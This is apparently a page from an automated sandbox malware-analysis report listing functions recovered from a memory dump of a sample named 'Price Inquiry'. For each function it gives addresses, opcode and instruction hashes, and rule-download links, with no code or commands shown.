Instruction Fuzzy Hash: EBF09031D166E19EE7228B5CCC49B22BBD49B05AA0F0A496AD54AC7A02CF74DC80C650

Function 01790115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94f7c23f35340b7fc10a8b918f980a6e134b17f45f66716f64c90a67e0aa2c2d
Instruction ID: 117293248826e0e74d89689369c3b4e8940dabffef0c37fe01c5718734a2accf
Opcode Fuzzy Hash: 94f7c23f35340b7fc10a8b918f980a6e134b17f45f66716f64c90a67e0aa2c2d
Instruction Fuzzy Hash: E6F027A64AAA801ACF326B2C74982D9FF69A741520F09544DF4A0A7309C6748887C320

Function 0170C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3362fc73f4e3b0bdfa227b45369e611162c1b155051d75eea9fcd7bfdb355579
Instruction ID: 74abd1b0dbc166c5036ab923406c69b8ff19a57a63f49990fd4867de9e688ff5
Opcode Fuzzy Hash: 3362fc73f4e3b0bdfa227b45369e611162c1b155051d75eea9fcd7bfdb355579
Instruction Fuzzy Hash: E6F05271402740DFE3338B5CC808B11FBE49B01BA0F0C97E5D802C3282C260FC80CA40

Function 01712619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 154d6ab607638d6b526c53fc5b3ef509fe96b68817fc85ee82da125b73e90a05
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: A3E0D8323016016BE7119E5D8CC4F57B7AEDFD2B14F14047DB6045F296C9E2DC0986A4

Function 01766030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: 11d38837cf052a3771ccce155a1f16e7924bc7157fb44aef3b40ceaa3540c827
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: 67F01C72104204AFE3218F09D944F62BBFDEB05364F95C069EA099B561D379EC40CBA4

Function 016D0710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 2420d5a9302b1c67e766c57281f3c020d76584e08840ba67a7394396bb9246f2
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: B6F0ED3A6047559BEB1ADF19C440AA9BBE8FB49360F010098F8528F311EB31E982CB94

Function 017049D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: 3331577d3b8e658fd2808270238ac5ed1befd4f1ba1844efbc8b38f2eee1f095
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 34E09272244345EBD7226A698808B66B6E6ABD07A0F150429E702CB1D0DB74DD80D798

Function 0177678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 545712707a3807f650bc6ab040d8e2d80fd2ecbec248388903183f33c26c7426
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: 8BE0DF32A00610FBEF22A7998D06F9AFEADDB90EA0F050054B701E70D4E530DE04D6D0

Function 016D25E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 354c114ccdcfa4afd529fe0b619904ef4d6c4cd7e502ec77654164c7aca883cf
Instruction ID: e87aa8014cdcd29cc2130fe3193a35c807f4e7f906f81c113b82d5944239ba35
Opcode Fuzzy Hash: 354c114ccdcfa4afd529fe0b619904ef4d6c4cd7e502ec77654164c7aca883cf
Instruction Fuzzy Hash: 82E092721006949BC321FB2ADD05F9A77AAEF60760F11451DB11557294CA30AC10C798

Function 01754000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 6ae0bc42e3cba69ef58aba67e535f2d6bfec223964f3eb6f86f2a3d2331c801f
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: A0E0C2343003058FE755CF19C044B62BBB6BFD5A10F28C0A8A9498F209EB73E882CB80

Function 0170CA38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b3cf91d5dcf7ad94734905cbfbdc7188061bf375ce084535261f6b55439bc6f
Instruction ID: a348cf8d8b9ddc85b96df559c34a5f2f790d40c66be54f25d88b48d56f11376d
Opcode Fuzzy Hash: 5b3cf91d5dcf7ad94734905cbfbdc7188061bf375ce084535261f6b55439bc6f
Instruction Fuzzy Hash: BDD02B72485120EECB77E2187C04FA37ADB9B40320F0189E4F308D2092D514CDC182D8

Function 016C823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: 5434e2d6a2bb59c32f52dcb869ed6def4dbcfacf8922ab2febadd2ae1d65d120
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: 8AE08631001510DED7322E19DC08B61B6A6FB94F10F20892DE0411706987749C82DA84

Function 016D2050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfdea178e5f6be8e25eba216a72512e9e33a81e8edd392c701077aabd507808c
Instruction ID: 82c50650c582b7dd83b015a781fcf9a7ef1081e5a1177ccea3bdd22e9fbf0839
Opcode Fuzzy Hash: dfdea178e5f6be8e25eba216a72512e9e33a81e8edd392c701077aabd507808c
Instruction Fuzzy Hash: FBE0C2321015A06BC321FB5EDD50F5A739FEFA4770F004229F1519B694CA30EC00C798

Function 01708A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 6848c40221e1fe8ac71c331f11b27653f4310a93967702cbf34f0c320d553133
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: 9FE08673511B14C7C729DE18D511B72B7E4EF45720F09463EA613477C1C534E544C795

Function 01726AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: c674b27ba5ce95e198fa32a1b1744f1d5960f746b684b30ab075f89ef3fb410d
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: 9AD01736511A50ABC3329F1BEA04913BAF9FBC4A10705066EA54683A20C670A806CAA0

Function 0170E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 421ecbcd70ef39eb3aecc9d962d6946d5947615312cea3c78434cc77e7442418
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: FAD0A932248A20ABD732AA1CFC04FC373E9BB88B24F060499B009C7150C360EC81CA88

Function 0174E908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: 75c928726b0d3fe1f56e115ef0235cce41be6c53e11762a309825866594a33a8
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: 86E0EC359506849BDF26DF59CA44F5ABBF5BB94B50F150458A1085B660C739E900CB40

Function 016CA0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: 8cde073ff630bb7abb66767da1b675d57c0985a81326151262b29ed877960d44
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 2AD0223231307093CB2856956C04F736906EBC0EE4F0A006C340B93A00C1048C43C2E0

Function 0170A830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: aa0046e50920b6be3bc0cbe7dbc7928374cc1e000a3830b60e40540c22a2c0ba
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: FDD012371D054DBBCB119F66DC01F957BA9E764BA0F444120B505875A0C63AE960D584

Function 0170CA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091d77856b934cb0475915285a168e900e43d441c89388128dcbf99342a3761e
Instruction ID: ebf5765cb1e164912f249a50022aa576db5b4f121cc007be891d095542acab51
Opcode Fuzzy Hash: 091d77856b934cb0475915285a168e900e43d441c89388128dcbf99342a3761e
Instruction Fuzzy Hash: 57D05E30901105CBDF17CF48C91492AB6B0EB10640B4001ACFA0152120D324D9018610

Function 0170C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: a4b90432c12a3141325e351e57c240558338cbbd3d1a23e672661f308cad4633
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 32C01232290648AFC712AA99CD01F027BAAEBA8B40F000061F2058B670C631E820EA88

Function 016F0310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 3c6eeda5affe1ef2923bf2d39c072278b7a00c989fab96b60e612aaf64a628b0
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 49D01237100249EFCB01DF41C890D9A772BFBD8710F10801DFD19076118A31ED62DA50

Function 016D0750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: ef1e7e68e2d34f777529f1325ed11e156c85fed1929440216549fea379c67f9c
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 4DC0487A702A468FDF16DB6AD798F49B7E4FB44740F1508D0E805CBB22EA24E842CA10

Function 01714340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b851142e8077576fd731885654de5c739007d8e3085f204f228bf173452750
Instruction ID: 33aaa40acf3e32732f31928ae2090a07708a6d5df16a740d193333aa074e0ffa
Opcode Fuzzy Hash: a1b851142e8077576fd731885654de5c739007d8e3085f204f228bf173452750
Instruction Fuzzy Hash: B8900231609810129240715848855468055A7E0301B55C021E0424564CCE158B575362

Function 01714650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93332eaaca87113d07a38eb471fb98ffe5c53cc0925607b1cad11a8820074638
Instruction ID: aad07e42a163a7af6b144fe69dd96eea0e03a665128c7d4e1775feb56c9bc0a5
Opcode Fuzzy Hash: 93332eaaca87113d07a38eb471fb98ffe5c53cc0925607b1cad11a8820074638
Instruction Fuzzy Hash: BA90026160551042424071584805406A055A7E1301395C125E0554570CCA198A56936A

Function 01712BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cdbd9210504328c4ab690f8fd5ed85e20c24a0585f8bcf390dd57c2baa1fa2e
Instruction ID: d79abf5b492707684e2f600b506c9a14ac2652d67bd70f11a64cc3fbd8267b3c
Opcode Fuzzy Hash: 6cdbd9210504328c4ab690f8fd5ed85e20c24a0585f8bcf390dd57c2baa1fa2e
Instruction Fuzzy Hash: D290023120541802D2807158440564A405597D1301F95C025E0025664DCE168B5A77A2

Function 01712BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d1fcb6b341290fc183953713d2ba8b32751607455296a573710151776dd511c
Instruction ID: 0dcf7d0b3a3bc20f84a77126c863d94bd9f9314e3e003f177d1f805f2baab717
Opcode Fuzzy Hash: 9d1fcb6b341290fc183953713d2ba8b32751607455296a573710151776dd511c
Instruction Fuzzy Hash: FC90023120945842D24071584405A46406597D0305F55C021E00646A4DDA268F56B762

Function 01712BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f20925b48ba45ee54b59a7609db1bd71da6a28830346e22f63475e01226b20
Instruction ID: 63c714db74d2b980495af9c713d380aebe6e5f44f79c3425a85f14339511f968
Opcode Fuzzy Hash: e8f20925b48ba45ee54b59a7609db1bd71da6a28830346e22f63475e01226b20
Instruction Fuzzy Hash: 2D90023160941802D25071584415746405597D0301F55C021E0024664DCB568B5677A2

Function 01712B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6adf8887c2a6ae5ad0862f8d2f33334f1c333f14689715781f87f5c32dbee51b
Instruction ID: 574867bb9a627c2bbeaf6b659ca706c7d01f4786898ae8d3cda8931ca2138a52
Opcode Fuzzy Hash: 6adf8887c2a6ae5ad0862f8d2f33334f1c333f14689715781f87f5c32dbee51b
Instruction Fuzzy Hash: 1E90023120541802D20471584805686405597D0301F55C021E6024665EDA668A927232

Function 01712AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27a51ea4cbf960977693855c8af60cad8c1c40bd883830e9f93d2dd1091c5d1a
Instruction ID: 09f5384359b8b948224631ee58572aa16b03da92ac902054dec2b49ca08b8b1e
Opcode Fuzzy Hash: 27a51ea4cbf960977693855c8af60cad8c1c40bd883830e9f93d2dd1091c5d1a
Instruction Fuzzy Hash: C4900225225410020245B558060550B4495A7D6351395C025F14165A0CCA228A665322

Function 01712AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee1b3ebbcef97920ac9152a5e64d71ba7a57fbab0a892a712eb82537b80aaa8
Instruction ID: 33cbdb254eae647f3c2e0825399d2699f44236f1639f74523def2130e4e7a7b4
Opcode Fuzzy Hash: eee1b3ebbcef97920ac9152a5e64d71ba7a57fbab0a892a712eb82537b80aaa8
Instruction Fuzzy Hash: 32900225215410030205B5580705507409697D5351355C031F1015560CDA228A625222

Function 01712AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c22e617ffd57774719ed64e2899b4f87e553444c8edf2f33a3724275dcd0212
Instruction ID: 695329118261de023be1f8f0409699112da6a7704611b2caa98be9021f44e0b2
Opcode Fuzzy Hash: 3c22e617ffd57774719ed64e2899b4f87e553444c8edf2f33a3724275dcd0212
Instruction Fuzzy Hash: 249002A1205550924600B2588405B0A855597E0201B55C026E1054570CC9268A529236

Function 01712D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 894e66bc5e228f000624e26ac9e5a871dbcba1ff71d43be023cc97d35f360aaf
Instruction ID: 91ed4f329e14552357a79492356f9a754ff3f3101f2ebf1508ff286e728c2cbc
Opcode Fuzzy Hash: 894e66bc5e228f000624e26ac9e5a871dbcba1ff71d43be023cc97d35f360aaf
Instruction Fuzzy Hash: C290022130541003D240715854196068055E7E1301F55D021E0414564CDD168A575323

Function 01712D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42d56036cdeedd83e00b74ea11d424adf6e3f80a52c9176d1bc5c434af0404d
Instruction ID: 8761cdffe7d0b50b18ce94d9407253e3315194e8b8d9efb2a2d0e82b6696f693
Opcode Fuzzy Hash: d42d56036cdeedd83e00b74ea11d424adf6e3f80a52c9176d1bc5c434af0404d
Instruction Fuzzy Hash: 3E90022921741002D2807158540960A405597D1202F95D425E0015568CCD168A6A5322

Function 01712D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed127e33cae7e0912b23c7ba56d1fe627ff5d394ce5dfa7dc073c353474ebeb2
Instruction ID: 89f93bb4db1163d556c39d062925f2124fa38cfd0fa513375d4cd8a8d70b9acf
Opcode Fuzzy Hash: ed127e33cae7e0912b23c7ba56d1fe627ff5d394ce5dfa7dc073c353474ebeb2
Instruction Fuzzy Hash: 4690022120945442D20075585409A06405597D0205F55D021E10645A5DCA368A52A232

Function 01712DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28fe47d7c7f6752366c52ad3bfd5277c93c6e5b4594dcfe280dc5a1ae4c3f15e
Instruction ID: da07f52755c4e22cbcf93cea99ca55a504d4fa410be03a16efb91c897b4cda3d
Opcode Fuzzy Hash: 28fe47d7c7f6752366c52ad3bfd5277c93c6e5b4594dcfe280dc5a1ae4c3f15e
Instruction Fuzzy Hash: F0900221246451525645B15844055078056A7E0241795C022E1414960CC9279A57D722

Function 01712DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14957f105365360792f44bf1b0b78c234b1eb98a10cf519ca619532d7b2cba64
Instruction ID: f2bdd992ca598ba497ee455b1d6542f60a02088873b6f6f1d7f4ac3284e73ca9
Opcode Fuzzy Hash: 14957f105365360792f44bf1b0b78c234b1eb98a10cf519ca619532d7b2cba64
Instruction Fuzzy Hash: FA90023124541402D241715844056064059A7D0241F95C022E0424564ECA568B57AB62

Function 01712C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cd9428ba603c3caa95f834cf91f965506de07f2e7a5331d99654dc44b655f7d
Instruction ID: 1352402aedd89c7b885d307f9ae508b4e5454cf77c46bc61a5587d7c6616ad34
Opcode Fuzzy Hash: 1cd9428ba603c3caa95f834cf91f965506de07f2e7a5331d99654dc44b655f7d
Instruction Fuzzy Hash: D590023120541842D20071584405B46405597E0301F55C026E0124664DCA16CA527622

Function 01712CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2437001703.00000000016A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16a0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
